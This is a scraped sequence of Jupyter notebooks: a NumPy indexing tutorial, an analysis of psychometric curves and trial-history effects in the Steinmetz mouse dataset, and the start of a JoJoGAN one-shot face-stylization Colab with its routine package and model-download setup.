# + id="Bf7jVIKzkte1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="17a209a3-3c0c-490f-f70a-cea5e250010f"
arr = np.array([[1,2,3]])
print(arr)
print(arr.shape)
# + id="mmgF_vs3k_Pl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="ce82102a-80b7-4bfb-e2d1-6e5c10b626ef"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[:2, 1:3])
# + id="fVEevadxlO4D" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="e06ddf48-d2c5-4553-f71b-74e778cf5c39"
arr = np.array([1,2,3])
print(arr[:0])
print(arr[:1])
print(arr[:2])
# + id="VtxJE2NglpRD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 121} outputId="b51fe062-61aa-480a-fdd1-2f51d24e348d"
arr = np.array([1,2,3])
print(arr[0:3])
print(arr[1:3])
print(arr[2:3])
print(arr[0:1])
print(arr[0:2])
print(arr[0:3])
# + id="4-2176m5mydj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 104} outputId="7f0a747c-6c4e-4cef-af2a-83adde3f8ca8"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[2, 1])
print(arr[:2])
print(arr[0:2])
# + id="0pD2bT0CnrOJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="a0609496-bd5c-4ba9-f9e3-f93f5cdb65b2"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[:2, 1:3])
# + [markdown] id="DXYYtoLjn8Y7" colab_type="text"
# print(arr[:2, 1:3]) this means from
#
# np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
# firstly 0th and 1th element of list is selected that is [1,2,3,4], [5,6,7,8] now out of them 1:3
# position is selected i.e from [1,2,3,4] [2 3] is selected and from [5,6,7,8] [6 7] is selected.
# + id="hgBGz3T3peoV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="6178476c-b121-428d-9e56-42f0b9688f09"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
row_r1 = arr[1, :]
row_r2 = arr[1:2, :]
print(row_r1)
print(row_r2)
# + id="oyG5BecNqQJ6" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="1681c835-875f-4b3e-fd93-9d925a71861b"
a = [1,2,3]
print(a[0])
print(a[0:1])
# + id="881KDS33--Rt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="c2d74a10-0bef-4b0a-d09e-d2736864e71f"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
row_r1 = arr[1, :]
row_r2 = arr[1:2, :]
print(row_r1.shape)
print(row_r2.shape)
# + id="nfGcM4Nm_9pu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 139} outputId="94035796-401d-4a4e-d85b-13647fed43e6"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
row_r1 = arr[:, 1]
row_r2 = arr[:, 1:2]
print(row_r1)
print(row_r2)
print(row_r1.shape)
print(row_r2.shape)
print(arr.shape)
# + id="7pGTFNVmBLc8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="7b41a22c-28bd-407b-df17-c95070c61971"
arr = np.array([[1, 2], [3, 4], [5, 6]])
print(arr[[0, 1, 2], [0, 1, 0]])
# + [markdown] id="gI-u7lpJCcl0" colab_type="text"
# print(arr[[0, 1, 2], [0, 1, 0]]) this statement is equal to
#
# print(np.array([arr[0,0], arr[1,1], arr[2,0]]))
# + id="5hOSjGYrxAPw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="136b8889-8c1b-4d73-941a-b4e5f66e91f7"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr > 2)
# + id="sGjFX9G-xKWH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="98627c7a-fa2c-4cf5-e8a2-a249c0f83b46"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[arr > 2])
# + id="3XzvcPNdCxdQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="5e841268-4de1-446f-e921-888e885d5a61"
arr = np.array([1, 2])
print(np.dtype)
arr = np.array([1.0, 2.0])
print(np.dtype)
arr = np.array([1.0,2.0], dtype = np.int64)
print(arr)
# + id="t4xKQm1pyxUN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="34341b4f-501c-4b57-be9f-6eb78895493b"
arr = np.array([1, 2])
print(arr.dtype)
arr = np.array([1.0, 2.0])
print(arr.dtype)
arr = np.array([1.0,2.0], dtype = np.int64)
print(arr)
# + id="SLhw1ImpzNsm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="cfe2c985-7f5f-460c-d196-17ff6503a557"
arr_a = np.array([1.0, 2.0])
arr_b = np.array([3.0, 4.0])
print(arr_a + arr_b)
print(np.add(arr_a, arr_b))
# + id="HtdTyTO_3OBh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="c73f560f-0df7-4c6d-fd71-5b856056fb3d"
print(arr_b- arr_a)
print(np.subtract(arr_b, arr_a))
# + id="H_COm2pR3QWx" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="8e44777b-06ea-45ac-83f7-07dd802d112e"
print(arr_b * arr_a)
print(np.multiply(arr_b, arr_a))
# + id="71NYwYpczXw9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="a6850276-9c0d-408a-fb8b-711a022cbe60"
print(arr_b / arr_a)
print(np.divide(arr_b, arr_a))
# + id="NWRD9_h93Wtl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="374c7443-9576-4a72-ada9-7369aac1a140"
print(np.sqrt(arr_a))
print(np.sqrt(arr_b))
# + id="CnUmLMXT3ZFh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="0eca762a-0748-4150-9245-d8d6f7c069e4"
print(np.dot(arr_a, arr_b))
print(arr_a.dot(arr_b))
# + id="66HOMqJt3auR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="da9baced-6e1a-4a8e-9184-a174e2b2b5c8"
arr = np.array([arr_a, arr_b])
print(np.sum(arr, axis = 0))
print(np.sum(arr, axis = 1))
print(arr_a.T)
# + [markdown] id="T1n5tjay5Slm" colab_type="text"
# arr_a = np.array([1.0, 2.0])
#
# arr_b = np.array([3.0, 4.0])
#
# for axis = 0 [3+1 4+2] which is equal to [4 6]
#
# and for axis = 1 [1+2 3+4] which is equal to [3 7]
# + id="swF1utIf6Biy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="0a7cd709-ddd7-4f9e-b64c-486bab4a3695"
print(arr.T)
| 10,965 |
/NMA_Project/.ipynb_checkpoints/Steinmetz_psychometric.v3-checkpoint.ipynb
|
263b1207c2bc5850e6b4ba7d16bafaf5fc6255f3
|
[] |
no_license
|
Y-Akihiro/NMA2020
|
https://github.com/Y-Akihiro/NMA2020
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 304,061 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Psychometric Curve
# ## Import Libraries and functions
# +
import numpy as np
import pandas as pd
import os, requests
import matplotlib.cm as cm
colormap = cm.viridis
from functions import hide_toggle
hide_toggle()
# -
import functions
# dir(functions)
# ## Import plot functions and define parameters
# import matplotlib and set defaults
from matplotlib import rcParams
from matplotlib import pyplot as plt
rcParams['figure.figsize'] = [20, 4]
rcParams['font.size'] =15
rcParams['axes.spines.top'] = False
rcParams['axes.spines.right'] = False
rcParams['figure.autolayout'] = True
# ## Load data
# Load Data
from functions import load_names # a function to get the file names
# +
# This part takes time
fname = [] # initialize the list
fname = load_names()
print(fname)
# Data loading
alldat = np.array([])
for j in range(len(fname)):
alldat = np.hstack((alldat, np.load('steinmetz_part%d.npz'%j, allow_pickle=True)['dat']))
# -
alldat.shape
# ## Select session and group brain regions
# Function: dat, barea, NN, regions, brain_groups, nareas = load_data(n_session)
from functions import load_data
# ## Define functions: contrast difference & total contrast
# Function: dt, NT, task_diff, dtask_diff, dtdiff = get_task_difference(n_session)
# +
def get_task_difference(n_session):
dat, barea, NN, regions, brain_groups, nareas = load_data(n_session, alldat)
dt = dat['bin_size'] # binning at 10 ms
NT = dat['spks'].shape[-1]
l_cont = dat['contrast_left'] # contrast left
r_cont = dat['contrast_right'] # contrast right
cont_diff = l_cont - r_cont # contrast difference
abs_task_diff = np.abs(l_cont - r_cont) # absolute contrast difference
dtask_diff = np.diff(abs_task_diff) # change in contrast difference (current - previous)
# print(np.unique(dtask_diff))
dtdiff = np.insert(dtask_diff, 0, 0) # adjust the array size
# print(dtdiff.shape)
return dt, NT, cont_diff, abs_task_diff, dtask_diff, dtdiff
# dt, NT, task_diff, dtask_diff, dtdiff = get_task_difference(1)
# +
n_session = 8
dat, barea, NN, regions, brain_groups, nareas = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
plt.plot(cont_diff,'ro-', label='contrast difference')
plt.plot(dat['response'],'bo', label='response')
plt.legend()
plt.show()
# -
print(len(cont_diff))
unique, counts = np.unique(cont_diff, return_counts=True) # check the contrast differences and the number of occurences
dict(zip(unique,counts))
print('session: ', n_session)
print('contrast difference:', np.unique(cont_diff)[-1],' occurence:', counts[-1])
resp = (dat['response'][cont_diff==1])
# np.sum(resp)
# np.count_nonzero(resp==1)
# resp.shape
# ### Plot Rightward choice over contrast difference
# This cell is for model fitting (psychometric curve)
from scipy.optimize import curve_fit
from functions import func
func
# +
# def model_fit(func, xdata, ydata):
# '''
# For some reason, curve_fit doesn't work for the original data.
# Here, ydata is divided by 10 and the fit parameters are adjusted.
# '''
# popt, pcov = curve_fit(func, xdata, ydata/10)
# popt_correct = np.array([popt[0], popt[1], popt[2]*10, popt[3]])
# return popt_correct
# +
from functions import get_rightward # Get the % of rightward choice
# ========== Select session number ==========
n_session=11
dat, _, _, _, _, _ = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
rightward = get_rightward(dat, cont_diff)
xdata = np.unique(cont_diff)
ydata = rightward
# ========== Compute model fit (psychometric curve) ==========
popt, pcov = curve_fit(func, xdata, ydata)
# popt = model_fit(func, xdata, ydata)
# ========== Plot ==========
fig = plt.figure(figsize=(6,4))
plt.plot(xdata, ydata,'o-', label=n_session)
plt.plot(xdata, func(xdata, *popt), 'r--',
label='fit: x0=%5.3f, y0=%5.3f, a=%5.3f, b=%5.3f' % tuple(popt))
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('Session: %1.0f, '%n_session + dat['mouse_name'])
plt.legend(loc='upper left', fontsize=10)
plt.show()
# -
# ### 39 Sessions
# +
fig = plt.figure(figsize=(6,4))
# ========== Select session number ==========
rt_data = np.zeros((39,9))
for n_session in range(39):
dat, _, _, _, _, _ = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
rightward = get_rightward(dat, cont_diff)
rt_data[n_session,:]=rightward
# ========== Plot ==========
plt.plot(np.unique(cont_diff),rightward,'.', label=n_session, alpha=0.4)
# ========== Comput and plot mean and variance ==========
rt_mean = np.zeros(9)
for i in range(9):
rt_mean[i] = np.mean(rt_data[:,i])
# print(np.std(rt_data[:,i]))
plt.errorbar(np.unique(cont_diff)[i], np.mean(rt_data[:,i]), np.std(rt_data[:,i]), fmt='-ko')
plt.plot(np.unique(cont_diff), rt_mean, 'k-', alpha=1)
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('39 sessions')
# plt.legend()
plt.show()
# -
# ## History Dependence
def get_right_hist(dat, cont_diff):
"""
Inputs:
* dat - trial data
* cont_diff - contrast difference between left and right
Return:
* reasy_l - % of mice respond right for each contrast difference, previous trial is easy left
* rdiff_l - % of mice respond right for each contrast difference, previous trial is difficult left
* reasy_r - % of mice respond right for each contrast difference, previous trial is easy right
* rdiff_r - % of mice respond right for each contrast difference, previous trial is difficult right
"""
unique, counts = np.unique(cont_diff, return_counts=True) # check the contrast differences and the number of occurences
n_el = n_dl = n_er = n_dr = n_zero = 0
# Define easy/difficult left/right (boolean array)
easy_l = (cont_diff==-1) #+ (cont_diff==-0.75)
diff_l = (cont_diff==-0.25) #+ (cont_diff==-0.5)
diff_r = (cont_diff==0.25) #+ (cont_diff==0.5)
easy_r = (cont_diff==1) #+ (cont_diff==0.75)
reasy_l = np.zeros((easy_l.sum(),9,2)) # 59 x 9
rdiff_l = np.zeros((diff_l.sum(),9,2)) # 52 x 9
reasy_r = np.zeros((easy_r.sum(),9,2)) # 41 x 9
rdiff_r = np.zeros((diff_r.sum(),9,2)) # 62 x 9
rzero = np.zeros(((cont_diff==0).sum(),9,2)) # 126 x 9
# Check the number of trials for each difficulties
n_trials = np.zeros(6)
n_trials[0] = rzero.shape[0]
n_trials[1] = reasy_l.shape[0]
n_trials[2] = rdiff_l.shape[0]
n_trials[3] = rdiff_r.shape[0]
n_trials[4] = reasy_r.shape[0]
n_trials[5] = dat['spks'].shape[1]
for i in range(len(dat['response'])-1):
hist = cont_diff[i] # previous trial difficulty (size) & direction (sign)
idx_cont = np.where(unique==cont_diff[i+1])[0][0] # current trial difficulty and direction label (9 unique labels)
if hist == -1: #in unique[0:2]: # easy left
reasy_l[n_el, idx_cont,0] = dat['response'][i+1]
reasy_l[0,idx_cont,1] +=1
n_el += 1
elif hist == -0.25: #in unique[2:4]: # difficult left
rdiff_l[n_dl, idx_cont,0] = dat['response'][i+1]
rdiff_l[0, idx_cont,1] += 1
n_dl += 1
elif hist == 0.25: #in unique[5:7]: # difficult right
rdiff_r[n_dr, idx_cont,0] = dat['response'][i+1]
rdiff_r[0, idx_cont,1] += 1
n_dr += 1
elif hist == 1.0: #in unique[7:9]: # easy right
reasy_r[n_er, idx_cont,0] = dat['response'][i+1]
reasy_r[0, idx_cont,1] += 1
n_er += 1
elif hist == 0:
rzero[n_zero, idx_cont,0] = dat['response'][i+1]
rzero[0, idx_cont,1] += 1
n_zero += 1
else:
hist += 1 # some action. (whatever is fine to pass)
# print('Check: something is wrong')
# Use np.divide(a, b, out=np.zeros(a.shape), where=b!=0) to avoid 0 division error
r_easyr = np.divide(np.count_nonzero(reasy_r[:,:,0]==1,axis=0),
reasy_r[0,:,1],
out=np.zeros(np.count_nonzero(reasy_r[:,:,0]==1,axis=0).shape),
where=(reasy_r[0,:,1]!=0)) * 100
r_easyl = np.divide(np.count_nonzero(reasy_l[:,:,0]==1,axis=0),
reasy_l[0,:,1],
out=np.zeros(np.count_nonzero(reasy_l[:,:,0]==1,axis=0).shape),
where=(reasy_l[0,:,1]!=0)) * 100
r_diffr = np.divide(np.count_nonzero(rdiff_r[:,:,0]==1,axis=0),
rdiff_r[0,:,1],
out=np.zeros(np.count_nonzero(rdiff_r[:,:,0]==1,axis=0).shape),
where=(rdiff_r[0,:,1]!=0)) * 100
r_diffl = np.divide(np.count_nonzero(rdiff_l[:,:,0]==1,axis=0),
rdiff_l[0,:,1],
out=np.zeros(np.count_nonzero(rdiff_l[:,:,0]==1,axis=0).shape),
where=(rdiff_l[0,:,1]!=0)) * 100
r_zero = np.divide(np.count_nonzero(rzero[:,:,0]==1,axis=0),
rzero[0,:,1],
out=np.zeros(np.count_nonzero(rzero[:,:,0]==1,axis=0).shape),
where=(rzero[0,:,1]!=0)) * 100
return r_easyr, r_easyl, r_diffr, r_diffl, r_zero, n_trials
hide_toggle()
def plot_hist(n_session, dat, cont_diff, rightward, r_diffr, r_easyr, r_easyl, r_diffl):
fig = plt.figure(figsize=(7,5))
xdata = np.unique(cont_diff)
plt.plot(xdata, rightward,'bo-', label='all (%1.0f)'%n_trials[-1])
# popt,_ = curve_fit(func, xdata, rightward)
# plt.plot(xdata, func(xdata, *popt), 'b:',
# label='fit: all')
plt.plot(xdata, r_diffr,'g.-', label='diff_r (%1.0f)'%n_trials[3], alpha=0.5)
# popt,_ = curve_fit(func, xdata, r_diffr)
# plt.plot(xdata, func(xdata, *popt), 'g:',
# label='fit: diff_r')
plt.plot(xdata, r_easyr,'y.-', label='easy_r (%1.0f)'%n_trials[4], alpha=0.5)
# popt,_ = curve_fit(func, xdata, r_easyr)
# plt.plot(xdata, func(xdata, *popt), 'y:',
# label='fit: easy_r')
plt.plot(xdata, r_zero ,'ro-', label='zero (%1.0f)'%n_trials[0])
# popt,_ = curve_fit(func, xdata, r_zero)
# plt.plot(xdata, func(xdata, *popt), 'r:',
# label='fit: zero')
plt.plot(xdata, r_easyl,'c.-', label='easy_l (%1.0f)'%n_trials[1], alpha=0.5)
# popt,_ = curve_fit(func, xdata, r_easyl)
# plt.plot(xdata, func(xdata, *popt), 'c:',
# label='fit: easy_l')
plt.plot(xdata, r_diffl,'m.-', label='diff_l (%1.0f)'%n_trials[2], alpha=0.5)
# popt,_ = curve_fit(func, xdata, r_diffl)
# plt.plot(xdata, func(xdata, *popt), 'm:',
# label='fit: diff_l')
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('Session: %1.0f, '%n_session + dat['mouse_name'])
plt.legend(fontsize=8)
plt.show()
# ========== Select session number ==========
n_session=11
dat, _, _, _, _, _ = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
r_easyr, r_easyl, r_diffr, r_diffl, r_zero, n_trials = get_right_hist(dat, cont_diff)
# ========== Plot ==========
plot_hist(n_session, dat, cont_diff, rightward, r_diffr, r_easyr, r_easyl, r_diffl)
# +
rer = rel = rdr = rdl = rz = np.zeros(9)
for i in range(39):
n_session = i
dat, _, _, _, _, _ = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
r_easyr, r_easyl, r_diffr, r_diffl, r_zero, n_trials = get_right_hist(dat, cont_diff)
rdr = rdr + r_diffr
rdl = rdl + r_diffl
rer = rer + r_easyr
rel = rel + r_easyl
rz = rz + r_zero
# -
rer = rer/39
rel = rel/39
rdl = rdl/39
rz = rz/39
rdr = rdr/39
fig = plt.figure(figsize=(7,5))
xdata = np.unique(cont_diff)
plt.plot(xdata, rightward, 'bo-', label='all')
plt.plot(xdata, rdr, 'g.-', label='diff_r', alpha=0.5)
plt.plot(xdata, rer, 'y.-', label='easy_r', alpha=0.5)
plt.plot(xdata, rz , 'ro-', label='zero')
plt.plot(xdata, rel, 'c.-', label='easy_l', alpha=0.5)
plt.plot(xdata, rdl, 'm.-', label='diff_l', alpha=0.5)
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('Average of 39 Sessions (10 mice)')
plt.legend(fontsize=8)
plt.show()
# ## Modeling
dat['spks'].shape
(np.ones(3).reshape(-1,1)).shape
X=(np.linspace(-10,10,20)*np.ones(5).reshape(-1,1)).T
# +
from sklearn.linear_model import LogisticRegression
log_reg = LogisticRegression(penalty="none") # initialize the model with a hyperparameter.
# X matrix: (n_samples, n_features)
# y vector: (n_samples)
# X = np.ones((20,5))
y = np.concatenate((np.zeros(10), np.ones(10)), axis=0)
log_reg.fit(X, y) # fit the model
# -
y_pred = log_reg.predict(X)
# ### Psychometric Function Modeling (four-parameter logistic function)
# Curve fitting reference: https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.curve_fit.html
from scipy.optimize import curve_fit
from functions import func
# def func(x,x0,y0,a,b):
# '''
# Four-parameter logistic function for model fitting
# '''
# return y0 + a/(1+np.exp(-(x-x0)/b))
def psyc(x,x0,y0,a,b, mu, sigma):
'''
Four-parameter logistic function with noise (normal distributed) for sample data
'''
noise = np.random.normal(mu, sigma, np.array(x.shape[0]))
return y0 + a/(1+np.exp(-(x-x0)/b)) + noise
# +
N = 90 # number of points
xdata = np.linspace(-10,10,N)
ytrue = func(xdata, 0, 1,0.5)*10
ydata = ytrue + np.random.normal(0,0.5, np.array(xdata.shape[0]))
# Compute fit
popt, pcov = curve_fit(func, xdata, ydata)
# Plot stuff
fig = plt.figure(figsize=(6,4))
plt.plot(xdata, ytrue, label='true curve')
plt.plot(xdata, ydata,'r.', label='sample (pseudo) data')
plt.plot(xdata, func(xdata, *popt), 'g--',
label='fit: x0=%5.3f, a=%5.3f, b=%5.3f' % tuple(popt))
plt.legend(loc='upper left', fontsize=10)
plt.plot()
# -
# ## Test fitting
# +
fig = plt.figure(figsize=(6,4))
xdata = np.unique(cont_diff)
ydata = r_zero/10
# print(ydata)
plt.plot(xdata, ydata,'.-', label='diff_l data (%1.0f)'%n_trials[2])
popt, pcov = curve_fit(func, xdata, ydata, maxfev=1000)
plt.plot(xdata, func(xdata, *popt), 'g--',
label='fit: x0=%5.3f, a=%5.3f, b=%5.3f' % tuple(popt))
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('Session: %1.0f, '%n_session + dat['mouse_name'])
plt.legend(loc='upper left', fontsize=10)
plt.show()
# -
# ## Psychometric Function Model Fitting (CDF)
| 14,944 |
/stylize.ipynb
|
3eb9dfdb2cbbdb3f5c0ff2aefdae85aa7a91d5ed
|
[] |
no_license
|
jonbaer/googlecolab
|
https://github.com/jonbaer/googlecolab
| 2 | 2 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 2,461,173 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/jonbaer/googlecolab/blob/master/stylize.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="k_sHBJLwE6-s"
# # JoJoGAN: One Shot Face Stylization
# + cellView="form" id="F50ju05EgX_B"
#@title Setup. This will take a few minutes.
# !git clone https://github.com/mchong6/JoJoGAN.git
# %cd JoJoGAN
# !pip install tqdm gdown scikit-learn==0.22 scipy lpips dlib opencv-python
# !wget https://github.com/ninja-build/ninja/releases/download/v1.8.2/ninja-linux.zip
# !sudo unzip ninja-linux.zip -d /usr/local/bin/
# !sudo update-alternatives --install /usr/bin/ninja ninja /usr/local/bin/ninja 1 --force
# %load_ext autoreload
# %autoreload 2
import torch
torch.backends.cudnn.benchmark = True
from torchvision import transforms, utils
from util import *
from PIL import Image
import math
import random
import os
import numpy as np
from torch import nn, autograd, optim
from torch.nn import functional as F
from tqdm import tqdm
import lpips
from model import *
from e4e_projection import projection as e4e_projection
from google.colab import files
from copy import deepcopy
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
from google.colab import auth
from oauth2client.client import GoogleCredentials
os.makedirs('inversion_codes', exist_ok=True)
os.makedirs('style_images', exist_ok=True)
os.makedirs('style_images_aligned', exist_ok=True)
os.makedirs('models', exist_ok=True)
# !wget http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
# !bzip2 -dk shape_predictor_68_face_landmarks.dat.bz2
# !mv shape_predictor_68_face_landmarks.dat models/dlibshape_predictor_68_face_landmarks.dat
# %matplotlib inline
# + id="AgfLsIELgsLq" cellView="form" colab={"base_uri": "https://localhost:8080/"} outputId="464ac22e-7fff-413f-e9ab-0225fc369ffc"
#@title Load models
device = 'cuda' #@param ['cuda', 'cpu']
#@markdown You may optionally enable downloads with pydrive in order to authenticate and avoid drive download limits.
download_with_pydrive = True #@param {type:"boolean"}
drive_ids = {
"stylegan2-ffhq-config-f.pt": "1Yr7KuD959btpmcKGAUsbAk5rPjX2MytK",
"e4e_ffhq_encode.pt": "1o6ijA3PkcewZvwJJ73dJ0fxhndn0nnh7",
"restyle_psp_ffhq_encode.pt": "1nbxCIVw9H3YnQsoIPykNEFwWJnHVHlVd",
"arcane_caitlyn.pt": "1gOsDTiTPcENiFOrhmkkxJcTURykW1dRc",
"arcane_caitlyn_preserve_color.pt": "1cUTyjU-q98P75a8THCaO545RTwpVV-aH",
"arcane_jinx_preserve_color.pt": "1jElwHxaYPod5Itdy18izJk49K1nl4ney",
"arcane_jinx.pt": "1quQ8vPjYpUiXM4k1_KIwP4EccOefPpG_",
"disney.pt": "1zbE2upakFUAx8ximYnLofFwfT8MilqJA",
"disney_preserve_color.pt": "1Bnh02DjfvN_Wm8c4JdOiNV4q9J7Z_tsi",
"jojo.pt": "13cR2xjIBj8Ga5jMO7gtxzIJj2PDsBYK4",
"jojo_preserve_color.pt": "1ZRwYLRytCEKi__eT2Zxv1IlV6BGVQ_K2",
"jojo_yasuho.pt": "1grZT3Gz1DLzFoJchAmoj3LoM9ew9ROX_",
"jojo_yasuho_preserve_color.pt": "1SKBu1h0iRNyeKBnya_3BBmLr4pkPeg_L",
"supergirl.pt": "1L0y9IYgzLNzB-33xTpXpecsKU-t9DpVC",
"supergirl_preserve_color.pt": "1VmKGuvThWHym7YuayXxjv0fSn32lfDpE",
}
# from StyelGAN-NADA
class Downloader(object):
def __init__(self, use_pydrive):
self.use_pydrive = use_pydrive
if self.use_pydrive:
self.authenticate()
def authenticate(self):
auth.authenticate_user()
gauth = GoogleAuth()
gauth.credentials = GoogleCredentials.get_application_default()
self.drive = GoogleDrive(gauth)
def download_file(self, file_name):
file_dst = os.path.join('models', file_name)
file_id = drive_ids[file_name]
if not os.path.exists(file_dst):
print(f'Downloading {file_name}')
if self.use_pydrive:
downloaded = self.drive.CreateFile({'id':file_id})
downloaded.FetchMetadata(fetch_all=True)
downloaded.GetContentFile(file_dst)
else:
# !gdown --id $file_id -O $file_dst
downloader = Downloader(download_with_pydrive)
latent_dim = 512
ckpt = 'stylegan2-ffhq-config-f.pt'
# Load original generator
original_generator = Generator(1024, latent_dim, 8, 2).to(device)
downloader.download_file(ckpt)
ckpt = torch.load(os.path.join('models', ckpt), map_location=lambda storage, loc: storage)
original_generator.load_state_dict(ckpt["g_ema"], strict=False)
mean_latent = original_generator.mean_latent(10000)
# to be finetuned generator
generator = deepcopy(original_generator)
transform = transforms.Compose(
[
transforms.Resize((1024, 1024)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
)
# + colab={"base_uri": "https://localhost:8080/", "height": 566} cellView="form" id="vCZPSATBFzMI" outputId="8e5c94a2-2dbc-4028-c845-d3f12f61f91a"
plt.rcParams['figure.dpi'] = 150
#@title Choose input face
#@markdown Add your own image to the test_input directory and put the name here
filename = 'iu.jpeg' #@param {type:"string"}
filepath = f'test_input/{filename}'
# uploaded = files.upload()
# filepath = list(uploaded.keys())[0]
name = strip_path_extension(filepath)+'.pt'
# aligns and crops face
aligned_face = align_face(filepath)
downloader.download_file('e4e_ffhq_encode.pt')
# my_w = restyle_projection(aligned_face, name, device, n_iters=1).unsqueeze(0)
my_w = e4e_projection(aligned_face, name, device).unsqueeze(0)
display_image(aligned_face, title='Aligned face')
# + [markdown] id="gPMywfSGJUsI"
# # Use pretrained styles
# + id="LCLWiXoXwcJb" colab={"base_uri": "https://localhost:8080/", "height": 738} cellView="form" outputId="d60e4c9e-a920-43c0-b3ac-04af8b04547f"
plt.rcParams['figure.dpi'] = 150
pretrained = 'jojo' #@param ['supergirl', 'arcane_jinx', 'arcane_caitlyn', 'jojo_yasuho', 'jojo', 'disney']
#@markdown Preserve color tries to preserve color of original image by limiting family of allowable transformations. Otherwise, the stylized image will inherit the colors of the reference images, leading to heavier stylizations.
preserve_color = False #@param{type:"boolean"}
if preserve_color:
ckpt = f'{pretrained}_preserve_color.pt'
else:
ckpt = f'{pretrained}.pt'
downloader.download_file(ckpt)
ckpt = torch.load(os.path.join('models', ckpt), map_location=lambda storage, loc: storage)
generator.load_state_dict(ckpt["g"], strict=False)
#@title Generate results
n_sample = 5#@param {type:"number"}
seed = 3000 #@param {type:"number"}
torch.manual_seed(seed)
with torch.no_grad():
generator.eval()
z = torch.randn(n_sample, latent_dim, device=device)
original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent)
sample = generator([z], truncation=0.7, truncation_latent=mean_latent)
original_my_sample = original_generator(my_w, input_is_latent=True)
my_sample = generator(my_w, input_is_latent=True)
# display reference images
style_path = f'style_images_aligned/{pretrained}.png'
style_image = transform(Image.open(style_path)).unsqueeze(0).to(device)
face = transform(aligned_face).unsqueeze(0).to(device)
my_output = torch.cat([style_image, face, my_sample], 0)
display_image(utils.make_grid(my_output, normalize=True, range=(-1, 1)), title='My sample')
output = torch.cat([original_sample, sample], 0)
display_image(utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), title='Random samples')
# + [markdown] id="VZdYrfVcJdqa"
# # Train with your own style images
# + colab={"base_uri": "https://localhost:8080/", "height": 496} id="hgfk78K1ikb8" outputId="b79ceed1-0e9d-4cb2-cc74-1403ee1c5bad" cellView="form"
#@markdown Upload your own style images into the style_images folder and type it into the field in the following format without the directory name. Upload multiple style images to do multi-shot image translation
names = ['arcane_caitlyn1.jpeg', 'arcane_caitlyn2.jpeg'] #@param {type:"raw"}
targets = []
latents = []
for name in names:
style_path = os.path.join('style_images', name)
assert os.path.exists(style_path), f"{style_path} does not exist!"
name = strip_path_extension(name)
# crop and align the face
style_aligned_path = os.path.join('style_images_aligned', f'{name}.png')
if not os.path.exists(style_aligned_path):
style_aligned = align_face(style_path)
style_aligned.save(style_aligned_path)
else:
style_aligned = Image.open(style_aligned_path).convert('RGB')
# GAN invert
style_code_path = os.path.join('inversion_codes', f'{name}.pt')
if not os.path.exists(style_code_path):
